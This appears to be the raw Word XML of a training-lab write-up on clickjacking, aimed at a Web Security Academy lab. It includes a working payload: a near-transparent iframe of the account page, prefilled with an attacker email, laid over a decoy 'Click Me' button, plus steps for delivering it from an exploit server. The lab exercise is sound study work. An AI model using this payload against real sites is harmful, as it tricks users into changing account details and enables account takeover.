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D5DB" w14:textId="501F8964" w:rsidR="00320924" w:rsidRDefault="00973F43" w:rsidP="00973F43">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00973F43">
        <w:t>SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAAB47D" w14:textId="77EB7FFA" w:rsidR="00973F43" w:rsidRPr="0045781B" w:rsidRDefault="0045781B" w:rsidP="0045781B">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>The application possesses a vulnerability in its login functionality and a delete account button protected by a CSRF token. We will try to craft some HTML that frames</w:t>
      </w:r>
      <w:r w:rsidRPr="0045781B">
        <w:t xml:space="preserve"> the account page and fools the user into </w:t>
      </w:r>
      <w:r w:rsidR="00725D7B">
        <w:t xml:space="preserve">changing </w:t>
      </w:r>
      <w:r w:rsidRPr="0045781B">
        <w:t>their account</w:t>
      </w:r>
      <w:r w:rsidR="00725D7B">
        <w:t>’s email address</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by clicking on a decoy website’s button</w:t>
      </w:r>
      <w:r w:rsidRPr="0045781B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343CBE68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32B13E" w14:textId="16E075B8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D7E86A5" w14:textId="36981197" w:rsidR="00973F43" w:rsidRDefault="0039752E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application and login using the credentials provided to act as a target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6D2735" w14:textId="1B6A6635" w:rsidR="00E65A4E" w:rsidRDefault="00E65A4E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Now, as we studied in the article, we will try to craft a malicious HTML with some CSS which will come over the actual page and position itself onto the </w:t>
      </w:r>
      <w:r w:rsidR="00725D7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Change Email </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>button and will blur the original content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460BC2D6" w14:textId="7AF84BB7" w:rsidR="005742C4" w:rsidRDefault="005742C4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which the user will think that this is one of the </w:t>
      </w:r>
      <w:r w:rsidR="009871D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>steps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> of accessing their account and which will cause the user to click the malicious text appearing as a button and below it will be the </w:t>
      </w:r>
      <w:r w:rsidR="00725D7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>email change</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECEF20E" w14:textId="300C15C3" w:rsidR="009871D8" w:rsidRDefault="009871D8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exploit server and paste the payload into the body tag of the exploit and click store and view the exploit in order to see if </w:t>
      </w:r>
      <w:r w:rsidR="006D59C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>it’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> working correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1661AE" w14:textId="13F53A1A" w:rsidR="009871D8" w:rsidRPr="00825F83" w:rsidRDefault="009871D8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the end, deliver the exploit to the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A244228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8B68CC" w14:textId="198F0C1D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38CF5389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>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C479B4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iframe {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007D9415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position:relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA6AB1D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width:1000px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FF6E4C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height: 800px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72373B3D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opacity: .01;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE88700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z-index: 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328FDDF2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44269AD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div {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DCE6BF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position:absolute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8CD925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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        top:515px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19733D48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left:60px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7502A8A7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z-index: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020D0309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background-color: blue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483A2731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9FE621C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>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F06BED0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>&lt;div&gt;Click Me&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0FE047" w14:textId="3EA91414" w:rsidR="00973F43" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r w:rsidRPr="0039752E">
        <w:t>&lt;iframe src="https://0a990043041728bf84ab8d5400cd00aa</w:t>
      </w:r>
      <w:r w:rsidR="00725D7B" w:rsidRPr="00725D7B">
        <w:t>.web-security-academy.net/my-account?email=hacker@attacker-website.com"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1386616A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225B9A" w14:textId="5E12728D" w:rsidR="00973F43" w:rsidRP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973F43" w:rsidRPr="00973F43" w:rsidSect="00973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A0605"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D3E4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02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EA"/>
    <w:rsid w:val="002562EA"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="0039752E"/>
    <w:rsid w:val="0040394C"/>
    <w:rsid w:val="0045781B"/>
    <w:rsid w:val="00550BCF"/>
    <w:rsid w:val="005742C4"/>
    <w:rsid w:val="006D59C0"/>
    <w:rsid w:val="00725D7B"/>
    <w:rsid w:val="00825F83"/>
    <w:rsid w:val="00973F43"/>
    <w:rsid w:val="009871D8"/>
    <w:rsid w:val="00E6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FDB4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{63946321-D049-4BA1-904F-4695388E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F43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73F43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45781B"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr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5781B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825F83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39752E"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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rsid w:val="0039752E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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-20T07:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-20T09:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>